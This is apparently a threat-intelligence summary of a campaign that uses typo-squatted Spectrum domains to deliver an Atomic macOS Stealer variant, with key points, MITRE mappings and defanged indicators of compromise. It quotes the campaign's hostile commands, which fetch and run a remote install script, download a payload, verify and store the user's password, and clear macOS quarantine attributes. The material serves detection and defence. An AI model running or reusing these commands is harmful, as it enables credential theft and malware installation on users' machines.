A new variant of the Atomic macOS Stealer (AMOS) campaign uses typo-squatted domains mimicking Spectrum to deliver malicious payloads targeting macOS users by harvesting system passwords. The campaign is linked to Russian-speaking cybercriminals and employs multi-platform social engineering tactics with poorly implemented logic in its delivery infrastructure. #AtomicMacOSStealer #SpectrumTyposquatting #RussianCybercriminals
Keypoints
- The campaign uses typo-squatted domains mimicking Spectrum to lure victims into executing malicious commands.
- Different payloads are delivered based on the victim’s operating system, with macOS users receiving a malicious shell script to harvest passwords.
- The macOS script prompts users for system passwords, verifies them, saves them, and downloads an AMOS variant payload for execution.
- Russian-language comments in the source code indicate involvement of Russian-speaking threat actors.
- Delivery site logic contains errors, such as mismatched instructions for different platforms, indicating hastily assembled infrastructure.
- The AMOS malware uses native macOS utilities (dscl, sudo, xattr) to bypass security controls and evade detection.
- Compromised credentials pose risks of corporate system access, lateral movement, and facilitation of further intrusions like ransomware attacks.
MITRE Techniques
- [T1110] Brute Force – The script prompts users repeatedly for system passwords until the correct one is entered (“Continuously prompts ‘System Password:’ until correct password entered”).
- [T1059.004] Command and Scripting Interpreter: Unix Shell – Executes malicious shell script using Bash to download and run payloads (“/bin/bash -c “$(curl -fsSL https://applemacios[.]com/getrur/install.sh)”).
- [T1140] Deobfuscate/Decode Files or Information – Uses legitimate macOS utilities such as dscl and sudo to validate and escalate privileges (“Uses dscl . -authonly to verify the password,” “sudo -S xattr -c to bypass macOS security”).
- [T1078] Valid Accounts – The malware steals and saves valid user passwords to gain persistent access (“Saves the valid password to /tmp/.pass file”).
- [T1105] Ingress Tool Transfer – Downloads additional malicious payloads after initial infection (“Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update”).
Indicators of Compromise
- [Domain] Clickfix delivery and C2 infrastructure – panel-spectrum[.]net, spectrum-ticket[.]net, cf-verifi.pages[.]dev, applemacios[.]com, rugmel[.]cat
- [File Hash] AMOS variant malware file – eaedee8fc9fe336bcde021bf243e332a
- [URL] Contacted malicious URLs – https://cf-verifi.pages[.]dev/i.txt, https://applemacios[.]com/getrur/install.sh, https://applemacios[.]com/getrur/update